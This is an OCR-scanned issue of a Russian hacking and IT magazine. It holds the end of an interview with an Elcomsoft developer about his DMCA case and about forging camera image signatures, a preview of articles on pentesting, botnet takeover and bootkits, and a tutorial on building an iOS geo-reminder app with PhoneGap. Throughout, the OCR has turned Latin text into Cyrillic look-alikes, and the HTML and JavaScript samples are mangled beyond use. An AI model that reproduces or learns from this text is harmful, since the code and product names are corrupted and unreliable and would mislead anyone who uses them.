отъездом я должен был сделать сІеровШоп 
(показания под присягой) — видеозапись мои 
показаний. Мне задавали забавные вопросы, 
например: «Получал ли я когда-либо деньги от 
российского правительства?». Я честно 
признался, что да: я был студентом и получал 
деньги от российского правительства. Потом 
спросили, финансируется ли ЕІсотзоК россий- 
ским правительством и заказывало ли оно 
разработку этой программы. Явно были такие вот 
шпионские идеи. В итоге в декабре 2001 года мне 
разрешили уехать из Штатов, что я достаточно 
быстро и сделал. 



□ СУД, КАК УЖЕ ПРОЗВУЧАЛО ВЫШЕ, 
СОСТОЯЛСЯ ТОЛЬКО В ДЕКАБРЕ 2002. 
ВЫ НА НЕМ ПРИСУТСТВОВАЛИ? 



Мне и президенту ЕІсотзоК Александру 
Каталову не дали визу, но впустили в 
страну на суд по специальному документу РиЫіс 
Іпіегеві Рагоіе. Присяжные дня четыре думали и, 
насколько я помню, 17 декабря признали 
компанию ЕІсотзоК невиновной по всем пяти 
пунктам обвинения. С тех пор дело считается 
закрытым. Я считаюсь человеком, которого 
арестовали и которому предъявили обвинение, 
потом обвинение сняли и дело закрыли. Все. 



□ 



ЧТО ВЫ ДУМАЕТЕ ОБ ЭТОЙ ИСТОРИИ 
СЕЙЧАС, ПО ПРОШЕСТВИИ 



Н ЕС КОЛ ЬКИХ Л ЕТ? КАК СЧ ИТАЕТЕ, ЧТО 
ПОЛУЧИЛО ПРИЧИНОЙ, ЖАЛОБА АООВЕ 
ИЛИ ВСЕ ЖЕ ЧТО-ТО ИНОЕ? 

д Сейчас мне все это представляется так. У 
М американцев был закон БМСА. На тот 
момент он ни разу не применялся к физическому 
лицу, и поэтому им нужен был прецедент. Нужно 
было, чтобы какой-нибудь человек написал 
программу, после использования которой его 
можно было бы признать виновным. Необходимо 
было показать, что закон работает. В итоге 
получилось, что Саша Каталов за свои деньги 
защищал интересы американских граждан, 
защищал их право писать такого рода ПО. 

ВСЕ ЭТО КАК-ТО ПОВЛИЯЛО НА ВАШУ 
ДАЛЬНЕЙШУЮ КАРЬЕРУ, ЖИЗНЬ? 
БЫЛИ ПРЕДЛОЖЕНИЯ ОТ ДРУГИХ РАБОТО- 
ДАТЕЛЕЙ? 

д Была большая активность со стороны СМИ, 
м но через два года все успешно забыли об 
этом деле. Предложений о работе я не получал. В 
Штатах тем более — там у меня не было 
разрешения на работу. 

ЧТО Ж, ОСТАВИМ ДЕЛА ДАВНО 
МИНУВШИХ ДНЕЙ И ПОГОВОРИМ О 
НАСТОЯЩЕМ. НАД ЧЕМ РАБОТАЕТЕ 
СЕЙЧАС? 

д Ну, детально описывать не буду... Много над 
М чем идет работа. Никаких новых, прорыв- 
ных продуктов я вам обещать не могу. Но кто 
знает, может быть, у кого-нибудь родится 
гениальная идея, и эту идею за две недели 
реализуют на практике. 

КНИГИ БОЛЬШЕ ПИСАТЬ НЕ 
СОБИРАЕТЕСЬ? 

д С книгой ситуация была простая — мне 
м предложили ее написать, и я написал. Быть 
может, писать детективы экономически выгодно, 
но писать техническую или научную литературу... 
Если бы я больше ничего не умел, то, возможно, 
зарабатывал бы именно этим. Но время, 
потраченное на написание книги, не окупилось 
даже за те пять или шесть лет, в течение которых 
книга была в продаже. Всего было напечатано 
порядка 9 тысяч экземпляров. 

НЕДАВНО НА СОЫРЮЕЫСЕ 2.0 В ПРАГЕ 
ВЫ СДЕЛАЛИ ДОКЛАД О ВЗЛОМЕ 
ЦИФРОВЫХ ПОДПИСЕЙ В КАМЕРАХ САЫОІЧ. 
ОТКУДА ПОЯВИЛАСЬ ЭТА ИДЕЯ? 

д Я тоже люблю фотографировать, у меня 
М тоже есть фотоаппарат (Сапоп). Предысто- 
рия такова — одно время у нас работал 
сисадмин, который купил себе Сапоп 3000, и я, 
глядя на него, купил себе Сапоп 3500. Тогда я и 
узнал, что Сапоп есть технология подписи 
изображений, которые делает камера, но в моем 
аппарате она, к сожалению, не была реализова- 
на. Через два года я купил Сапоп 300, где эта 



□ 



□ 
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□ 



технологий уже использовалась. Мне стало 
интересно, как до нее добраться. Я стал рыться в 
Интернете и нашел некоторые наработки по 
Сапоп. Оказалось, есть такой опенсорсный 
проект под названием Мадіс Бапіет, в рамках 
которого люди дописывают к прошивке Сапоп 
свой код, чтобы увеличить функциональность 
фотоапапарта. Также существует форум проекта 
Сапоп Наскегз Беѵеіорегз Кіі, где люди 
обсуждают, как расширить функциональность 
«мыльниц» и «зеркалок». Там я нашел 
информацию о том, как расшифровать апдейт от 
Сапоп для последующего анализа, стал 
экспериментировать и пришел к тому, к чему 
пришел. Итог был удачно продемонстрирован на 
СОИРісІепсе 2.0. С камерами ІМікоп все оказалось 
еще легче. После покупки железяки (изЬ-донгл) 
для проверки подписи все было очень просто. 
Мне хватило чужого фото с подписью, найденно- 
го в Сети, и железки. Путем анализа я выяснил, 
как происходит формирование и проверка 
подписи и как ее подделать. Фотоаппарат ІМікоп 
я даже в руках не держал. 



□ МОЖЕТЕ ПОРЕКОМЕНДОВАТЬ 5-10 
КНИГ, КОТОРЫЕ НУЖНО ПРОЧИТАТЬ 
ЧЕЛОВЕКУ, ЖЕЛАЮЩЕМУ ЗАНИМАТЬСЯ 
ИНФОРМАЦИОННОЙ БЕЗОПАСНОСТЬЮ? 



Тем, кто хочет так или иначе использовать 
криптографию, рекомендую Ргасіісаі 
сгуріодгарбу Нильса Фергюсона и Брюса 
Шнайера. Это не справочник, а книга, которая 
помогает понять, почему и как нужно использо- 
вать криптографию. Атак... Я, к сожалению или к 
счастью, учил безопасность не по книжкам. Когда 
я начинал этим интересоваться, в России таких 
книг просто не было. Практика, только практика. 
Конкретных книг посоветовать, увы, не могу. 



□ 



КАК ВЫ ОЦЕНИВАЕТЕ РОССИЙСКОЕ 



ОБРАЗОВАНИЕ В СФЕРЕ ИТ? 
НЫНЕШНИХ СТУДЕНТОВ, НАШИХ 
ПРОГРАММИСТОВ? 



Если говорить в целом, с образование беда. 
Преподают хорошо, но у студентов нет 
возможности учиться нормально. Я смотрю на 
своих студентов — половина из них работает, и 
работает на полную ставку. Как можно учиться на 
дневном отделении и работать на полную ставку, 
я не представляю. Когда они учатся и какие у них 
знания на выходе, не знаю. Но понятно, что 
работают они не потому, что им скучно, а потому, 
что на стипендию выжить нельзя. 

У нас выпускают тысячи инженеров, но из 
них едва 1 % справляется с задачами, к решению 
которых их готовят. Что касается программистов, 
ответ у меня будет такой. Один мой знакомый, 
очень умный человек, тоже работающий в ІТ, 
как-то сказал: «Количество гениальных про- 
граммистов в России слегка преувеличено». У 
нас действительно есть классные программисты, 
но очень плохо с культурой коллективной работы. 
Поэтому умных программистов у нас, может, и 
много, но продуктов российского производства 
очень мало. □С 
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30 страницжурнала на одной полосе. 
Тизер некоторых статей. 



Ргеѵіеѵѵ 



ВЗЛОМ 
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ПРОБИВАЯ ЛОТУС, 

ИЛИ ИСТОРИЯ ОДНОГО ПЕНТЕСТА 

Некоторые специалисты по ИБ проводят 
тесты на проникновение по простой 
схеме: запустил сканер -> получил отчет 
-> передал отчетзаказчику-> получил 
вознаграждение. Ноэто история про 
неумелых лентяев. Настоящего пентесте- 
ра не испугаетнеобходимостьнастоящего 
ресерча. Леша Синцов рассказывает 
историю о пентесте внутри одного круп- 
ного предприятия, гдеему пришлось 
изрядно поковыряться с І_оІіі5 Ботіпо 
СопІгоІІег и самому написать сплоит для 
уязвимосого сервиса. Где удалось найти 
подсказки, как был отреверсен протокол, 
и где накосячили программисты ІВМ — 
читай в этой статье. 




РС20ЫЕ 



ВЗЛОМ 






МОБИЛЬНОЕ ПРИЛОЖЕНИЕ НАНТМІ.5 




ЧТО ДЕЛАТЬ С ШЕЛЛОМ В СИСТЕМЕ? 




36 


Можно ли разрабатыватьдля АпсІгоісІ и ЮБ, 


46 


Большая шпаргалка потому, что можно 


64 




не изучая их нативных языков? Запросто. 




сделать в консоли системы с помощью 





Создаем полноценное приложение для стандантныхсредств, не прибегая кдо- 

разных мобильных платформ за 30 минут. полнительномуПО. 



КАКУГНАТЬ БОТНЕТ? 

Нескол ько уязвимостей в админке зловре- 
да — три захвачнных ботнета. Это история 
отом, что ошибки в коде частенько делают 
и разработчики малвари. 



СЦЕНА 



МАШАКЕ 
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ХАКСПЕЙСЫ 

По всему миру можно насчитать около 
бООхакспейсов, где вместе работают 
увлеченные И Б люди.Атеперьтакие 
организации появились и в России. 



80 



СИЛЕНОІШОЧЕНЬ 

В вирлабахпо всему миру анализируют 
тело новогозловреда, который по ряду 
признаков до неприличия похож на на- 
шумевшийБіихпеІ. 



84 



ОБНАРУЖЕН ВООТКІТ! 

Мы взяли несколько вирусов, зара- 
жающихМВР, и посмотрели, насколько 
умело их могут обнаружить 5 популяр- 
ных анти вирусных решен ия. 
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РЬопебар: 

приложение 

на НТМІ_5 

КАК СОЗДАТЬ 
ПРОГРАММУ 
ДЛЯ СМАРТФОНА 
ЗА ПОЛЧАСА 



с 

ІІ'Іег.сот/агргогіисІіоп)^ 

і 



Михаил Давыдов 



Изучить новый язык и среду 
разработки — это минимум, что от тебя 
потребуется, если ты захочешь написать 
свое первое мобильное приложение. 
Чтобы с пониманием набросать 
элементарный Іобо Ііэі для АпсІгоісІ или 
Ю5, не передирая пример из книжки, 
уйдет не меньше пары недель. Но можно 
не осваивать О^’есііѵе-С или ^ѵа и при 
этом быстро разрабатывать приложения 
для смартфонов, если использовать такие 
технологии, как РНопебар. 




Запуск приложения в симуляторе І05 



ели ты внимательно изучал нововведения, которые ожидают 
нас в ѴѴіпсіоѵѵб 8, то, возможно, заметил, что под ней можно 
будет разрабатывать приложения на НТМІ.5. Идея, на са- 
мом деле, не новая — технологии, реализующие тот же подход для 
мобильных платформ, развиваются семимильными шагами. Одним 
из таких фреймворков, позволяющим разрабатывать приложения для 
смартфонов с помощью связки привычных для нас НТМІ_, баѵаЗсгірІ 
и С55!, как раз и является РЬопебар. Написанное с его помощью 
приложение подойдет для всех популярных платформ: Ю5, АпсІгоісІ, 
ѴѴіпсІоѵѵз РЬопе, ВІаскЬеггу, ѴѴеЬОЗ, ЗутЬіап и Ваба. Тебе не нужно 
будет изучать особенности программирования под каждую платформу 
(например, ОЦесІіѵе-С в случае с Ю5), разбираться с различными АРІ 
и средами разработки. Все, что потребуется для создания кросс- 
платформенного мобильного приложения, — это знание НТМІ.5 
и специального РЬопебар АРІ. При этом на выходе получится не тупая 
НТМІ_-страница, «обрамленная» в интерфейс приложения, нет! АРІ 
фреймворка позволяет задействовать практически все возможности 
телефона, которые используются при разработке с помощью нативных 
инструментов: доступ к акселерометру, компасу, камере (запись видео 
и фотосъемка), списку контактов, файловой системе, системе нотифи- 
каций (стандартных уведомлений на телефоне), хранилищам и т. д. На- 
конец, такое приложение может безболезненно обращаться к любому 
кросс-доменному адресу. Ты можешь воссоздать нативные элементы 
управления с помощью фреймворков вроде )0иегу МоЬіІе или ЗепсЬа, 
и конечная программа будет выглядеть на мобильном телефоне так, 
как будто она написана на нативном языке (ну или почти так). Лучше 
всего проиллюстрировать вышесказанное на деле, то есть написать 
приложение, поэтому предлагаю сразу приступить к практике. Засекай 
время — на все про все уйдет едва ли больше получаса. 

ЧТО МЫ БУДЕМ СОЗДАВАТЬ 

В качестве целевой платформы возьмем і 05 — да -да, деньги 
лежат в АррЗіоге, и монетизировать свои разработки пока лучше 
всего там :). Но сразу внесу ясность: все то же самое, без измене- 
ний, можно провернуть, скажем, для АпсІгоісІ. Долго думал, какой 
пример рассмотреть, так как писать очередную тулзу для учета 
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РЬопебар: мобильное приложение на НТМІ_5 



Геонапоминалка точки 







Страница с картой, открытая в мобильном браузере. Это еще не І05 приложение. 

списка дел совершенно не хотелось. Поэтому я решил создать 
приложение под названием «Геонапоминалка», навигационную 
прогу, назначение которой можно описать одной фразой: «Со- 
общи мне, когда я снова тут окажусь». В АррЗіоге есть немало 
утилит, которые позволяют «запомнить» место, где пользова- 
тель припарковал машину. Это почти то же самое, только чуть 
попроще. Ты сможешь указать на карте города точку, задать 
для нее определенный радиус и запрограммировать сообще- 
ние. Когда ты в следующий попадешь в пределы окружности 
с указанным радиусом, приложение выдаст тебе уведомление, 
а точка будет удалена. Будем действовать по такому плану: сна- 
чала создадим простое веб-приложение, проверим его в брау- 
зере, а затем перенесем с помощью РЬопебар на платформу Ю5. 
Очень важно написать в прототипе и протестировать в браузере 
на компьютере основную часть кода, поскольку отлаживать при- 
ложение в телефоне гораздо сложнее. В качестве каркаса мы 
возьмем Э5 -фрейм вор к ]0иегу с )С1иегу МоЬіІе ( ]диегѵтоЫІе.сот ). 
а в качестве движка карт — Ооодіе Марз ѵЗ. Приложение будет 
состоять из двух страниц: карты и списка точек. 

• На карте устанавливается маркер твоего текущего положения. 

По кликуна карте создается точка, ккоторой привязывается со- 
общение (вроде «машина рядом»). Точку можно удалить, кликнув 
на ней. Для перемещения маркера человека по карте использу- 
ется геонавигационный АРІ. 

• На страницесоспискомточекдолжна иметься дополнительная 
кнопка «Удалить все точки», а рядом с каждой точкой — кнопка 
«Удалить эту точку». Если кликнуть по элементу в списке, соот- 
ветствующаяточка отобразится на карте. Настройки пользова- 
теля и списокточекбудем сохранять в ІосаІЗіогаде. 



КАРКАС ПРИЛОЖЕНИЯ 

Сразу объясняю, зачем мы будем использовать іОиегу МоЬіІе. 

Эта Э5-библиотека предоставляет нам уже готовые элементы 
интерфейса мобильного приложения (максимально приближенные 
к нативным) для самых разных платформ. Нам ведь надо, чтобы 
на выходе было именно мобильное приложение, а не страничка 
из браузера! Так что качаем последнюю версию ЛЭиегу МоЬіІе 
( ^иегѵтоЬіІе.сот/сІоѵѵпІоасІ ) и переносим в рабочую папку первые 
файлы приложения, которые нам понадобятся: 

• ітадез/ (перенеси сюда все изображения из одноименной папки 
архива )д-тоЫ1е); 

• іпсіех.сзз; 

• іпсІех.ЫтІ; 

• іпсіехдз; 

• )диегудз; 

• Ідиегу.тоЫІе.тіп.сзз; 

• Ідиегу.тоЬіІе.тіпдз. 

Нужно сделать ресурсы в основном локальными, чтобы пользо- 
ватель в будущем не тратил мобильный интернет. Теперь создаем 
каркас страниц в файле іпбех.ЫтІ. Приведенный ниже код описы- 
вает верхнюю часть страницы с картой, надписью «Геонапоминал- 
ка» и кнопкой «Точки». 

Страница с картой 

ссііѵ сіаѣа-гоіе^'ра^е" сІаІіа-сІот-сасЬе^Чгие" 
с1аз5= ,, ра§е-тар" ісІ="іпсІех ,, > 

<с!іѵ сІаІіа-гоІе^'ЬеасІег" > 

< Іі1>Геона поминал ка</ 61 > 

<а 6ге-Р="#роіп1і5" с1азз="иі-Ы:п-гі§Ы:" ісІ="тепи-роіп1:5" 
сІа1:а-1:пап5І1:іоп= ,, рор ,, >Точки</а> 

</сііѵ> 

<сііѵ сІа1:а-го1е= ,, соп1:еп1: ,, > 

<Діѵ ій="тар-сапѵа5"> 

< ! -- Тут будет карта --> 

</сііѵ> 

</сііѵ> 

</сііѵ> 

Атрибут страницы сIа■|:а-сIот-сас^^е= ,, 1:пие ,, необходим для того, чтобы 
она не выгружалась из памяти. Для кнопки «Точки» используется 
гіа^а-ѣгапзіѣіоп^'рор", чтобы страница «Список точек» открывалась 
с эффектом «Всплытие». Подробнее о том, как устроены страницы 
Ібііегу МоЬіІе, можно почитать в хорошем Мануэле ( ЬіТІѵМХХЗМ ). 



ДРУГИЕ ПОЛЕЗНОСТИ РН0ІМЕ6АР 

Кроме потрясающей платформы для мобильных приложений, 
РЬопебар также предоставляет сервис для сборки твоего 
приложения в «облаке». Под все платформы и в один клик! Сборщик 
условно бесплатный. Ты можешь зарегистрироваться на сайте 
РЬопебар ВиіІсІ ( ЬиіІсІ.рЬопеоар.сот ) и получить доступ к сборщику. 

С его помощью ты вправе собрать неограниченное число приложений 
с открытым исходным кодом и одно приложение с закрытыми 
исходниками. Понятно, что если нужно скомпилировать больше 
закрытых приложений, то придется немного заплатить. 

Если тебе не хватает какого-нибудь функционала в «базовой 
комплектации» РЬопебар, то ты можешь расширить его возможности 
с помощью плагинов. Существует целый репозиторий ( аЬЬиЬ.сот/ 
рЬоп еда р/рЬ опера р-рі ид іпз ), который включает в себя четыре 
раздела іРЬопе, АпсІгоісІ, Раіт, ВІаскВеггу. Сейчас под ІОБ написано 
более 20 плагинов: Вагсосіебсаппег (сканер штрих-кодов), АсІРІ- 
идіп (отображения рекламы іАб), ІЧабѵеСопІтоІз (нативные для ІОЗ 
контролы) и другие. 
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РС20ЫЕ 



По аналогии создаем страницу со списком точек: 

Страница со списком точек 

<с!іѵ с!а1:а-го1е="ра%е" с!а1:а-сІот-сасІіе="1:гие" 
сІазБ^'ра^е-ріпІіБ" ісІХроіпіБ"^ 

<сііѵ сІа1:а-го1е= ,, ІіеасІег ,, > 

<! --Удаляет все точки из списка--> 

<а Ііге-Р="#" сІаі:а-1:Ііете="Ь" с!а1:а-ісоп="сІе1е1:е" 
ісІ="сІе1е1:е-а11 ,, >Удалить все</а> 

<Ы>Точки</Н1> 

<!--Кнопка Карта--> 

<а І'іге-Р^^іпсіех" сІаББХиі-Ыіп-гі^ІтІ:" 
сІаІіа-ігапБІІііоп^'рор" сІа1:а-сІігес1:іоп= ,, пеѵег5е ,, > 
Ка рта 
</а> 

</сііѵ> 



<СІІѴ> 

<! --Список точ ек--> 

<и1 ісІ= " іібі: " сІа1:а-го1е="1І5І:ѵіе^" 
сІа1:а-іп5е1:= "Іігие" сІаі:а-5р1і1=-ісоп="сІе1е1:е"> 

</и!> 

</сііѵ> 

</сііѵ> 

Для кнопки «Карта» тоже пропишем сІа1а-1гап5І1іоп=»рор», 
но добавим атрибут ба1а-сІігес1іоп=»геѵег5е», чтобы страница 
«Карта» открывалась с эффектом «Затухание». Те же атрибуты 
пропишем в шаблоне точки. Все, наш каркас готов. 

СОЗДАНИЕ ПРИЛОЖЕНИЯ 

Теперь надо отобразить карту, для чего мы возьмем стандартный 
АРІ Соодіе Марз, который используется миллионами разных сайтов: 

ѵаг 1а1:І-п§ = пем §т. І_а1:І-п§( 

ІіІіІБ.орІііопБ.ІаІ:. 1:ІіІ5.ор1:іоп5.1п^^ ; 

И"ііб . т ар = пеы ет.МарІ'еІетепІ: . I 

грот: іііііб .орІііопБ . грот. // Выбираем начальный зум 
сепіег: 1а1:І_п§., // Уста навлива ем н ача льный ц е нтр 
тарТѵреІсІ: ^ш.МарТѵреІсІ.КОАРМАР. // Обычная карта 
сІІБаЫеРоиЫеСІіскІоот: Іігие. 

// Отключаем автозум по тапу/двойному клику 

сІІБаЬІеРе-РаиІІіІІІ : Ігие 

// Отключаем все элементы интерфейса 

Нт 

Здесь Вт — это переменная, ссылающаяся на объект Воодіе 
Марз. Параметры инициализации я хорошо закомментировал 
в коде. Следующий шаг — отрисовка маркера человечка на карте: 

ііііб . регзоп =_пш_§т.Магкег({ 
тар: ііИіб . тар , 

ісоп: пеш ^т .МагкегІтаее(РЕК501\І 5РКІТЕІІКІ. . 
пем рі.5І2е(48. 48)) 

В качестве РЕР50І\І_5РКІТЕ_ІІРЕ используется адрес спрайта 
человечка из Воодіе-панорам. Его статический адрес — 

сот/тарТІез/сЬ/тос! сЬ Бсоиі/сЬ зсоиі зргііе арі ООЗ.рпд . Поль- 
зователь будет добавлять точки, кликая на карте, поэтому, чтобы их 
отрисовывать, мы будем слушать событие сііск: 

ет. еѵепі:. ас1с1І.І5І:епег (1:ІіІ5 . тар. ' сііск' ^ -Рипсііоп (еѵепі:) X 

Беі-Р. гедие5І=Ме5 5а§ е(-Рипс1:іоп ( егг . те55а§е) { 

// Метод, возвращающий текст, введенный пользователем 
і-р ( егг) геіигп; 

// Метод добавляет точку в список активных и 
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Прописываем ЕхІегпаІНозІз 

// отрисовывает ее на карте 

5е1-Р.асІсІРоіп1:( еѵепі:. 1а1:І_п§, 
зеІ-Р.орііопБ . гасІіи5 л тезза^е); 

5е1-Р.ирсІа1:еРоіп1:5ЕІ5і(); // Перер исовываем список точек 

Ь -Раізе) ; 

Я привожу бОльшую часть кода — остальное ищи на диске. 
Дальше нам нужно научить приложение перемещать иконку поль- 
зователя по карте. В прототипе мы задействуем Веоіосаііоп АРІ 
(тот, который используется в том числе в десктопных браузерах): 

і-р (паѵі%а1іог.%ео1оса1:іоп) { 

// Проверяем, поддерживает ли браузер геолокацию 

-Рипсііоп ЕФзБиссеззГроз) { 

ѵаг ІаХ 1п§; 

і-р (роз. соогсіз) { 

ІаХ = роз . соогсіб . Іа ііііисіе ; 

1п% = роз.соогсіз. Іоп^іііисіе; 

} еізе I 

Іаі = роз . Іаіііисіе ; 

1п§ = роз.1оп§і1:ис^ 

БеІ-Р.тоѵеРепБопРпеы ^т. ЕаЛп^РІа - !:. 1 п]е;)); 

// Перемещаем иконку пользователя 

Ь_ 

// Каждые три секунды запрашиваем текущее 

// положение пользователя 

ыіпсіоы. зеіІпІіегѵа К-РипсІііоп П I 

// Запрашиваем текущее положение 

паѵі^аІіог.^еоІосаІііоп.^еІіСиггепІіРозіІііоп^рзБиссезз. 
$.поор_, { 

епаЬІеНі^ІіАссигасѵ: Іігие. 
тахітитА§е: 300ѲѲѲ 

}); 

Ь 3000); 

Ь- 

Метод тоѵеРегзоп с помощью простой процедуры 
деіРоіпІзІпВоипсІзО проверяет, не находится ли пользователь 
в какой-нибудь активной точке. Последний вопрос — где хранить 
списокточек? В НТМЕ5 появилась возможность использовать 
ІосаІЗіогаде, так что не будем ей пренебрегать (предоставляю тебе 
самостоятельно разобраться с этими участками кода, которые я 
хорошо закомментировал). Итак, приложение, работающее в брау- 
зере, готово! 

ЗАПУСК ВЕБ-ПРИЛОЖЕНИЯ 

Как я уже говорил, отладку в основном необходимо выполнять 
на компьютере. Самый подходящий браузер для тестирования 
веб-приложений на компьютере — это 5аіагі или СЬготе. После 
отладки в этих браузерах ты можешь быть уверен в том, что твое 
приложение не «поедет» в браузере мобильного телефона. Оба 
этих браузера совместимы с большинством мобильных веб- 
браузеров, поскольку точно также, как и они, построены на основе 
движка ѴѴеЬКіІ. После устранения всех багов можно переходить 
к запуску мобильного веб-приложения непосредственно на теле- 
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фоне. Для этого настрой свой веб-сервер (пусть даже йепѵѵег или 
ХАМРР), чтобы он отдавал созданную страницу, и открой ее уже 
в браузере мобильного телефона. Приложение должно выглядеть 
примерно так, как показано на рисунке. Тут важно понимать, что 
будущее мобильное приложение, собранное для мобильной плат- 
формы с помощью РЬопебар, будет выглядеть почти один в один, 
за исключением того, что на экране не будет отображаться на- 
вигационная панель браузера. Если все хорошо, можно приступать 
к созданию из странички полноценного Ю5-приложения. Заметь, 
что РЬопебар и ЮЕ для мобильной разработки мы до этого момента 
даже не трогали. 

ПОДГОТОВКА 

Для того чтобы собрать приложение под ІОБ, тебе нужен компьютер 
с операционной системой Мае 05 10.6+ (или виртуальная машина 
на Мае 05 10.6), а также среда разработки Хсобе с установленным 
Ю5 5йК. Если у тебя не установлен 5йК, придется скачать с сайта 
Арріе образ диска, включающий в себя Хсобе и І05 5йК ( сіеѵеіорег. 
арріе.сот/сіеѵсепіег/іоз/іпсіех.асііоп і. Имей в виду, что образ весит 
около 4 Гб. Кроме этого, тебе понадобится зарегистрироваться 
на сайте Арріе в качестве разработчика (если ты не собираешься 
публиковать свое приложение в Арр51оге, то это требование можно 
обойти). С помощью этого набора можно разрабатывать приложе- 
ния на нативном для Ю5 языке ОЬ)есІіѵе-С. Но мы решили пойти об- 
ходным путем и воспользоваться РЬопебар, поэтому нам еще нуж- 
но установить пакет РЬопебар Ю5. Просто скачай архив с офсайта 
( Ьирз://дііЬиЬ.сот/саІІЬаск/рЬопедар/ 2 ІрЬа 11/1 .2.0 ). распакуй его и в 
папке Ю5 запусти программу установки. Когда установка завер- 
шится, в меню проектов Хсобе должна появиться иконка РЬопебар. 
После запуска придется заполнить несколько форм, но уже очень 
скоро ты увидишь рабочую область ЮЕ с твоим первым приложени- 



ем. Чтобы проверить, все ли работает, нажми кнопку Рип — должен 
запуститься эмулятор іРЬопе/іРаб с шаблонным приложением 
РЬопебар. Собранная программа выдаст ошибку с сообщением 
о том, что іпбех.ЫтІ не найден, — это нормально. Открой папку, 
в которой ты сохранил первичные файлы проекта, и найди в ней 
подпапку ѵѵѵѵѵѵ. Перетащи ее в редактор, кликни на иконке прило- 
жения в списке слева и в появившемся окне выбери «Сгеаіе Іюісіег 
геРегепсез Рог апу абсіесі Роісіегз». Если запустить программу еще 
раз, то все должно заработать. Теперь можно скопировать все фай- 
лы нашего прототипа в папку ѵѵѵѵѵѵ. Пора подпилить наш прототип 
для работы на смартфоне в обработке РЬопебар. 

ПЕРЕНОС ПРОТОТИПА 

В первую очередь нужно подключить рЬопедар-1.2.0д5 в твой ин- 
дексный файл. РЬопебар позволяет ограничивать список доступ- 
ных для посещения хостов. Предлагаю сразу настроить такой «бе- 
лый список». В меню проекта открой 5иррогРіпд РіІез/РЬопебар. 
рІізР, найди пункт ЕхРегпаІНозРз и добавь в него следующие хосты, 
к которым будет обращаться наше приложение (это сервера боодіе 
Марз): *.дз1а1іс.сот, *.доодІеаріз.сот, тарз.доодіе.сот. Если их 
не указать, программа выдаст предупреждение в консоли и карта 
не отобразится. Для инициализации веб-версии нашего прило- 
жения мы использовали событие йОМРеасІу или хелпер )0иегу: 
$(боситепР).геасІу(). РЬопебар генерирует событие беѵісегеасіу, 
которое говорит о том, что мобильное устройство готово. Предла- 
гаю этим воспользоваться: 

сІоситепіі.асІсІЕѵепІіЕІБІіепегС'сІеѵісегеасІу" . -РипсЕіоп О { 
пеш Мо1:ібса1:оп($("#тар-сапѵа5") [0] ) ; 

// Если у пользователя нет интернета. 

// сообщаем ему об этом 

(паѵі§а1:ог . пеімогк. соппесіііоп.ііуре === 

Соппесііоп . ІМОІМЕ) { 

паѵі^аіог .поІіібсаІііоп.аІегІіГ'Нет интернет- соединения" , 

Ь_ 

Ь -Ра1зе)і 

Это событие проверяет, есть ли у пользователя хоть какое- 
нибудь интернет-соединение. Если его нет, выводим соответствую- 
щее сообщение. Вместо функции паѵідаРог.побРісаРіоп.аІегР можно 
использовать более привычную аІегР, но ее минус в том, что она вы- 
глядит менее естественно для мобильного приложения. Сейчас нам 
хватит и этих знаний, но ты можешь подробнее прочитать о пеіѵѵогк. 
соппесРіоп ( ЬіСІѵ/иЕѵВѵѵг І и способах нотификации ( ЬіСІѵЛкѵ2Е2 ). 
Запретим скроллинг: 

сІоситеп1і.асІсІЕѵеп1:І.І5І:епег("1:оисЬтоѵе" . -Рипсіііоп (еѵепі:) { 
еѵепі . ргеѵепІЮе-РаиіЩХ; 

} , -Раізе) ; 

Затем заменим все вызовы аІегР и сопРігт на нативные, которые 
предоставляет нам РЬопебар: 

паѵі^аііоп.поііібсаіііоп.сопбгпі/ 'Удалить точку? ' . 

-Рипсіііоп ( Ьи-ЫюпісО { 



ІЛ-ФРЕЙМВОРКИ 



ІОиегу МоЬіІе — это, конечно, не единственный фреймворк для 
создания мобильного интерфейса. На сайте РЬопебар приведен 
огромный список библиотек и фреймворков, которые ты можешь 
использовать ( рЬопедар.сот/іооІз ): 5епсЬа ТоисИ, Ітрасі, йоіо Мо- 
ЬіІе, 2ер1одз и др. 
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(ЬиТ1:оп_ісІ === 1) { // Нажа та кнопка О К 
зеі-р. гетоѵеРоіп1:(роіп1:) ; 

} 

}, ТІПЕ) ,; 

Последнее, что нам нужно поменять, — это блок кода, пере- 
мещающий иконку пользователя по карте. Наш текущий код тоже 
работает, но работает менее оптимально (перемещает иконку, даже 
если координаты не изменились) и дает не такие богатые данные, 
как аналог в РЬопебар: 

паѵі^аТог .^еоІосаТіоп .ша1:сІіРо5І1:іоп (-Рипс1:іоп (розіТіоп) { 
зеі-р . тоѵеРег50п(леіл!_§т . І_а1:І_п§( 
розіііі оп . соогсіз . 1а1 =і1=исІе , 
розіііі оп . соогсіз . Іоп^ іТисЫ ) ; 

Ь -Рмпсиоп (еггог) { 

паѵі^аііог . поТібсаІііоп . аІегК 

’сосіе: ' + еггог. сосіе + '\пте55а§е: ' + еггог. тевза^е^ 

$. ПООДд 

ТІПЕ 

); 

Ь { 

■Ргедиепсу: 30Ш 

}); 

Этот код более изящный — он генерирует событие только 
тогда, когда координаты изменились. Жмем кнопку Рип и убеж- 
даемся, что только что созданное нами приложение отлично 
работает в симуляторе ЮБ-устройства ! Пора приступать к запуску 
на реальном устройстве. 

ЗАПУСК НАУСТРОЙСТВЕ 

Подсоедини іРЬопе, іРосІ или іРасІ к компьютеру, на котором за- 
пущен Хсобе. Программа определит новое устройство и попро- 
сит разрешения использовать его для разработки. Нет смысла 
ей отказывать :). Повторю еще раз: чтобы запустить написанное 



ДРУГИЕ ПЛАТФОРМЫ 

Кроме РИопебар, существуют и другие платформы, позволяющие 
создавать мобильные приложения без использования нативных 
языков. Перечислим наиболее крутых игроков. 

Аррсеіегаіог Тііапіит ( ѵѵѵѵѵѵ.аррсеіегаіог.сопп ). 

Тііапіит умеет собирать приложения в первую очередь под 
АпсІгоісІ и іРИопе, но в нем также заявлена поддержка ВІаскВеггу. 
Кроме самого фреймворка, проект предоставляет набор нативных 
виджетов и ЮЕ. Ты можешь разрабатывать приложения на Тііа- 
піит бесплатно, однако за поддержку и дополнительные модули 
придется заплатить (от $49 в месяц). Цена некоторых сторонних 
модулей доходит до $120 за год. Разработчики Аррсеіегаіог Тііапіит 
утверждают, что на основе их фреймфорка написано более 25 
тысяч приложений. Исходный код проекта распространяется под 
лицензией АрасНе 2. 

Согопа 5РК ( ѵѵѵѵѵѵ.апзсатоЬіІе.сот/согопа ). 

Эта технология поддерживает основные платформы — ІОБ и Ап- 
сІгоісІ. Фреймворк нацелен в основном на разработку игр. Еще бы, 
ведь разработчики заявляют о высококачественной оптимизации 
на 0реп6І_. Бесплатной версии у платформы нет, а цена довольно-таки 
